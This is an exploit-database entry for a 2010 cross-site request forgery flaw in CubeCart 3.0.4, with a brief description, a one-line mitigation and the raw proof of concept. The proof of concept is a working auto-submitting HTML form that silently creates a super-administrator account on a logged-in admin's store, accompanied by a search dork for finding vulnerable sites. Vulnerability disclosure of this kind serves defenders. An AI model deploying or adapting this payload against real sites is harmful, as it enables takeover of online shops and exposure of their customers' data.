CubeCart 3.0.4 - exploit.company

vendor:

CubeCart

by:

P0C T34M

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: CubeCart

Affected Version From: 3.0.4

Affected Version To: 3.0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:cubecart:cubecart:3.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

CubeCart 3.0.4 <= CSRF Add Admin

CubeCart 3.0.4 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page containing a form with hidden fields and submit it to the vulnerable application. This will add an admin user to the application without the user's knowledge or consent. This vulnerability was discovered by P0C T34M in 2010.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

#Title    : CubeCart 3.0.4 <= CSRF Add Admin
#Script   : CubeCart 3.0.4
#Language : Php
#Download : http://www.cubecart.com/
#Date     : 2010/12/24
#Version  : 3.0.4
#Dork     : "Powered by CubeCart 3.0.4"
#Found    : by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc


<form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post">

          <input name="name" type="hidden" value="myname"/ >
    <input name="adminUsername" type="hidden" value="r00t" />
    <input name="email" type="hidden" value="myemail@hotmail.com">
        <input name="adminPassword" type="hidden"  value="t00r" />
    <input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/>
    <input name="adminId" value="" type="hidden"/>
    <input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/>
 
 
</form>
<script>document.p0c.submit();</script>

NICKNAME: P0C T34M